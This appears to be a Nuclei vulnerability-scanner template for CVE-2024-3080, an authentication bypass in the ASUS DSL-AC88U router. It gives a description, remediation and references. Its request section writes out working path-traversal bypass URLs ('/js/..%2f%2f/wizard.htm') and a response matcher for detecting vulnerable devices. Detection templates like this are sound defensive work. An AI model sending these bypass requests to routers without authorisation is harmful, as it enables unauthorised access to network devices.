id: CVE-2024-3080

info:
  name: ASUS DSL-AC88U - Authentication Bypass
  author: ritikchaddha
  severity: critical
  description: |
    A vulnerability in the ASUS DSL-AC88U router permits unauthorized individuals to bypass authentication.When adding "/js/..%2f%2f" or "/images/..%2f%2e" to the requested URL, it will be recognized as passing the authentication.This vulnerability is part of a broader authentication bypass issue affecting multiple ASUS router models.
  remediation: |
    Update the router firmware to the latest version.Implement network segmentation to restrict access to the router's management interface.
  reference:
    - https://github.com/Shuanunio/CVE_Requests/blob/main/ASUS/DSL-AC88U/ACL%20bypass%20Vulnerability%20in%20ASUS%20DSL-AC88U.md
    - https://thehackernews.com/2024/06/asus-patches-critical-authentication.html
    - https://nvd.nist.gov/vuln/detail/cve-2024-3080
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3080
    cwe-id: CWE-287
  metadata:
    max-request: 2
  tags: cve,cve2024,asus,router,auth-bypass,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/js/..%2f%2f/wizard.htm"
      - "{{BaseURL}}/images/..%2f%2f/wizard.htm"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "show_wizardmenu();"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b657c62c259f33009abca68619bfe667cc744b0919baa20b61c30423a806d88c0220266178fb61c85a6cf55be6adf4e2c608f5477ae83de036b0899bf95c5b72bdcc:922c64590222798bb761d5b6d8e72950